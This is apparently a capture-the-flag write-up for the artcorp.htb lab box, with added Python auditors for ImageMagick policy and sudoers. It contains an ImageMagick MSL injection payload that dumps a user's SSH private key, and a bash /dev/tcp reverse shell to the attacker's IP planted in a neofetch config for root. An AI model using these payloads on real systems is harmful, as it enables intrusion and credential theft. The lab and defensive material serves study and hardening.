0x01 Introduction
Target machine IP: 10.10.11.140.
Local machine IP: 10.10.16.6, a Mac with an M1 chip.
0x02 Information Gathering
Only ports 22 and 80 are open in the port scan.
Accessing port 80 on 10.10.11.140 redirects to http://artcorp.htb/, which does not resolve yet. Add the hostname to the hosts file and try again.
gobuster vhost -u artcorp.htb -w /Users/grayash/pentesting/web-basic/p12-字典收集/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
Accessing metaview, there is a file upload point.
Let's try uploading an image.
A little digging shows that the output displayed for the uploaded image is produced by exiftool.
0x03 Exploitation
RCE is possible here, with CVE-2021-22204 as the vulnerability identifier.
Exploit:
Since the exploit needs exiftool installed and is awkward to reproduce on a Mac, switch to Kali for this part.
Kali's IP is: 10.10.14.14.
Set the IP in the exploit to Kali's IP.
Run the exploit file to generate image.jpg.
Start listening on Kali.
nc -nlvp 9090
Access http://dev01.artcorp.htb/metaview/ and upload the generated image.jpg. A successful shell will be obtained.
Set up an interactive terminal.
python3 -c "import pty;pty.spawn('/bin/bash')"
script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset
xterm (typed in answer to the "Terminal type?" prompt that reset shows)
0x04 Privilege Escalation
The current privilege is www-data, and there is no permission to view the user.txt file.
find / -perm -4000 -type f 2>/dev/null
Use pspy64 to watch the processes running on the system; a shell script, convert_images.sh, shows up. Let's see what this script contains.
The content is as follows:
The mogrify command processes an image according to specified options (resize to given dimensions, blur, crop, dither, etc.). Unlike convert, which writes the result to a different image file, mogrify overwrites the original image file in place.
Refer to this article:
https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
<image authenticate='ff" `echo $(cat /home/thomas/.ssh/id_rsa)> /dev/shm/key`;"'>
<read filename="pdf:/etc/passwd"/>
<get width="base-width" height="base-height" />
<resize geometry="400x400" />
<write filename="test.png" />
<svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="msl:poc.svg" height="100" width="100"/>
</svg>
</image>
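The MSL payload above only works because the ImageMagick security policy on the host leaves the MSL coder (and the Ghostscript-backed PDF/PS coders) enabled when convert_images.sh runs mogrify over untrusted uploads. Besides upgrading ImageMagick, the standard mitigation is to deny those coders in policy.xml. The following script is an added example for this write-up (not code from the page or from ImageMagick); it parses a policy file and reports which risky coders are still enabled. The two sample policies are constructed for the demonstration.

```python
"""Audit an ImageMagick policy.xml for coders that should be denied.

Added example, not code from the original write-up or from ImageMagick.
Reports which risky coders a given policy leaves enabled.
"""
import xml.etree.ElementTree as ET

# Coders that should carry rights="none" on a host that processes untrusted
# images: MSL is the scripting coder abused above, PS/EPS/PDF/XPS go through
# Ghostscript, MVG/TEXT/URL/HTTP/HTTPS allow drawing scripts and remote fetches.
RISKY_CODERS = {"MSL", "MVG", "TEXT", "URL", "HTTP", "HTTPS",
                "PS", "PS2", "PS3", "EPS", "PDF", "XPS"}


def denied_coders(policy_xml: str) -> set:
    """Return the coder names that the policy explicitly denies.

    Only plain names and brace lists ("{PS,PDF}") are understood; a wildcard
    deny-all ("*") followed by explicit re-allows is not modelled.
    """
    root = ET.fromstring(policy_xml)
    denied = set()
    for pol in root.iter("policy"):
        if pol.get("domain", "").lower() != "coder":
            continue
        if pol.get("rights", "").strip().lower() != "none":
            continue
        pattern = pol.get("pattern", "").strip().strip("{}")
        denied.update(name.strip().upper()
                      for name in pattern.split(",") if name.strip())
    return denied


def missing_denials(policy_xml: str) -> list:
    """Risky coders the policy does not deny, sorted so output is stable."""
    return sorted(RISKY_CODERS - denied_coders(policy_xml))


# Constructed sample: a permissive policy of the kind the convert_images.sh
# job would have run under (only two coders denied, MSL and PDF left open).
LAX_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
  <policy domain="coder" rights="none" pattern="HTTPS"/>
</policymap>"""

# Constructed sample: the same policy with the risky coders denied and the
# indirect "@file" read syntax blocked as well.
HARDENED_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="{PS,PS2,PS3,EPS,PDF,XPS}"/>
  <policy domain="coder" rights="none" pattern="{MSL,MVG,TEXT,URL,HTTP,HTTPS}"/>
  <policy domain="path" rights="none" pattern="@*"/>
</policymap>"""

if __name__ == "__main__":
    for label, policy in (("lax", LAX_POLICY), ("hardened", HARDENED_POLICY)):
        print(f"{label}: still enabled -> {missing_denials(policy) or 'none'}")
```

To audit a real installation, read the file with `ET.parse("/etc/ImageMagick-6/policy.xml")` (the path varies by version and distribution) and pass `ET.tostring(tree.getroot())` to `missing_denials`. The policy is defence in depth: the `authenticate` shell injection itself was fixed upstream, so the upgrade matters as much as the policy.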
Copy this SSH key into the .ssh directory under the Kali home directory as id_rsa. Because the payload extracts it with `echo $(cat ...)`, the line breaks are collapsed into spaces, so restore the key to its original one-line-per-row layout and set the file permission to 400.
Then log in over SSH with the id_rsa private key to obtain user.txt.
ssh -i id_rsa thomas@10.10.11.140
Next, escalate to root privileges.
Run sudo -l and find that thomas is allowed to execute the following command.
(root) NOPASSWD: /usr/bin/neofetch \"\"
Run the neofetch command, and the effect is as follows:
According to https://gtfobins.github.io/#neo, if this binary is allowed to run under sudo, it can be used for privilege escalation.
Look at the sudo -l output again and note that the environment variable XDG_CONFIG_HOME is preserved. neofetch reads its configuration file from the directory that variable points to, so we can write a reverse shell into that configuration file; when neofetch is executed through sudo, the shell comes back as root.
The specific steps are as follows:
- Prepare a reverse shell script.
bash -c 'exec bash -i &>/dev/tcp/10.10.14.14/1234 <&1'
- Write it at the beginning of /home/thomas/.config/neofetch/config.conf.
- Import the environment variable.
export XDG_CONFIG_HOME="$HOME/.config"
- Start listening with netcat.
nc -nlvp 1234
- Execute neofetch.
sudo -u root /usr/bin/neofetch \"\"
A shell will be successfully reversed, and root.txt can be obtained.
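The escalation above works because sudo preserves XDG_CONFIG_HOME, so the program running as root loads a config file the caller controls. A defender can catch this pattern by pairing each sudo command rule with the environment variables that sudoers lets through. The parser below is an added example for this write-up (not code from the page); it understands the common subset of sudoers syntax (Defaults env_keep, Defaults:user env_keep, and user/host/runas/tag/command rules) and ignores aliases, includes and `env_keep -=`. The sample sudoers text is constructed, modelled on the sudo -l output in this write-up.

```python
"""Flag sudo rules whose risk is raised by preserved environment variables.

Added example, not code from the original write-up. Pairs each sudoers
command rule with the kept variables that redirect a program to
user-controlled files.
"""
import re

# Variables that change where a program looks for configuration or code.
DANGEROUS_ENV = {"XDG_CONFIG_HOME", "HOME", "PATH", "LD_PRELOAD",
                 "LD_LIBRARY_PATH", "PYTHONPATH", "PERL5LIB", "BASH_ENV", "ENV"}

# Defaults[:user|@host|>runas|!cmd] env_keep [+]= "VAR VAR ..."
ENV_KEEP_RE = re.compile(
    r'^Defaults(?:([:!>@])(\S+))?\s+env_keep\s*\+?=\s*"?([^"]+?)"?\s*$')
# user host=(runas) [TAG: ...] command
RULE_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?'
    r'(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')


def _lines(text):
    """Yield non-empty, non-comment sudoers lines with surrounding space removed."""
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            yield line


def parse_env_keep(text: str):
    """Return (global_vars, per_user_vars) collected from env_keep Defaults."""
    global_vars, per_user = set(), {}
    for line in _lines(text):
        m = ENV_KEEP_RE.match(line)
        if not m:
            continue
        scope_kind, scope, names = m.groups()
        names = set(names.split())
        if scope_kind == ":":   # Defaults:user1,user2 applies to those users only
            for user in scope.split(","):
                per_user.setdefault(user, set()).update(names)
        else:                   # unscoped, or host/runas/command scoped: treat as global
            global_vars.update(names)
    return global_vars, per_user


def audit_sudoers(text: str) -> list:
    """Return one finding per command rule that can see a dangerous kept variable."""
    global_vars, per_user = parse_env_keep(text)
    findings = []
    for line in _lines(text):
        first = line.split()[0]
        if first.startswith("Defaults") or first.endswith("_Alias"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        user = m.group("user")
        kept = (global_vars | per_user.get(user, set())) & DANGEROUS_ENV
        if not kept:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        findings.append({
            "user": user,
            "runas": m.group("runas") or "root",
            "command": m.group("cmds").strip(),
            "nopasswd": nopasswd,
            "kept_env": sorted(kept),
            "severity": "high" if nopasswd else "medium",
        })
    return findings


# Constructed sample, modelled on the sudo -l output in this write-up.
SAMPLE_SUDOERS = r"""
Defaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
Defaults:thomas env_keep+=XDG_CONFIG_HOME
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
thomas ALL=(root) NOPASSWD: /usr/bin/neofetch \"\"
"""

# The same file with the env_keep line removed: neofetch then reads root's own
# config directory and this particular vector is closed.
HARDENED_SUDOERS = SAMPLE_SUDOERS.replace(
    "Defaults:thomas env_keep+=XDG_CONFIG_HOME\n", "")

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
```

Removing the env_keep entry closes the config-file vector, but a NOPASSWD rule for a binary listed on GTFOBins still deserves review on its own; the check only scores the combination that this box exposed.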
0x05 Conclusion
- Couldn't find the target machine for CVE-2021-22204 after searching for a long time. Some of the Docker ones haven't been set up yet. Fortunately, I learned how to exploit the CVE-2021-22204 vulnerability.
- Learned about privilege escalation using ImageMagick.